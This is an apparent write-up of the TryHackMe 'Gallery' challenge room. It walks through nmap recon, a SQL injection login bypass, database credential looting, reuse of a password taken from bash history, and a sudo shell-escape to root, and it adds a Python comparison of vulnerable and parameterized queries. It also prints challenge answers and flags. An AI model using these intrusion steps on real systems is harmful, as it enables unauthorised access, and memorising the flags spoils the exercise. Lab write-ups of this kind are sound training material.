Gallery — TryHackMe’s Challenge Room Simple WriteUp | Karthikeyan Nagaraj
140 Points — Try to exploit our image gallery system — Gallery Challenge Simple WriteUp with Answers | 2023

Basic Recon — Nmap:
nmap -sC -sV 10.10.181.99
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Simple Image Gallery System
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Task 1 — Deploy and get a Shell:
1. How many ports are open?
Ans: 2
2. What’s the name of the CMS?
On navigating to http://<MACHINE-IP>:8080, we get to know that the website is using:

Ans: Simple Image Gallery
3. What’s the hash password of the admin user?
Let’s inject SQL into the login panel:

' or 1=1 -- -
1. As usual, obtain the reverse shell
2. Get the interactive Bash
3. Execute the initialize.php file in /var/www/html/gallery
4. With the creds, connect to the db
mysql -u gallery_user -p
5. Use the Below commands to show, access and list the db
show databases;
use gallery_db;

6. Then list the tables in gallery_db

7. Finally use the command
select * from users;
Ans: a228b12a08b6527e7978cbe5d914531c
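
The login bypass used for question 3 works because the input is spliced into the SQL text. The Python/sqlite3 code below is an added example, not code from the gallery application or from the author of this write-up: the table layout, the sample user, the MD5 digest and the choice of the username field are assumptions, made to show a concatenated query beside a parameterized one.

```python
import hashlib
import hmac
import sqlite3

PAYLOAD = "' or 1=1 -- -"  # login input from the write-up


def digest(password):
    # Assumption: MD5, chosen only because the stored value is 32 hex characters.
    return hashlib.md5(password.encode()).hexdigest()


def make_db():
    # Constructed sample data; schema and credentials are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", digest("constructed-password")))
    return db


def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text: a quote in `username` closes the
    # string literal, `or 1=1` makes the WHERE clause true for every row,
    # and `-- -` comments out the password comparison.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + digest(password) + "'")
    return db.execute(sql).fetchone() is not None


def login_hardened(db, username, password):
    # The placeholder binds `username` as data, so it is never parsed as SQL.
    row = db.execute("SELECT password FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    # Constant-time comparison of the stored and supplied digests.
    return hmac.compare_digest(row[0], digest(password))


if __name__ == "__main__":
    db = make_db()
    for name, pw in [("admin", "constructed-password"), ("admin", "wrong"),
                     (PAYLOAD, "anything")]:
        print(repr(name), login_vulnerable(db, name, pw),
              login_hardened(db, name, pw))
```

The hardened function fixes only the injection; stored passwords should additionally use a salted, slow password hash rather than a bare digest.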
4. What’s the user flag?
- On inspecting .bash_history, you can notice that the user typed the password on the command line with sudo
- Use the password to log in as Mike using
su mike
- Then “cat” will help you
Ans: THM{af05cd30bfed67849befd546ef}
Task 2 — Escalate to the root user
1. What’s the root flag?
1. Check what files the user is capable of running as root using
sudo -l
2. Run the file
/opt/rootkit.sh
which can be run with sudo permission
3. Type
read
in the prompt and press Enter
4. After the editor is opened, type the command
reset; sh 1>&0 2>&0

5. Now you will be root : )
Ans: THM{ba87e0dfe5903adfa6b8b450ad7567bafde87}
Thank you for Reading ~
Happy Learning ~
Author: Cyberw1ng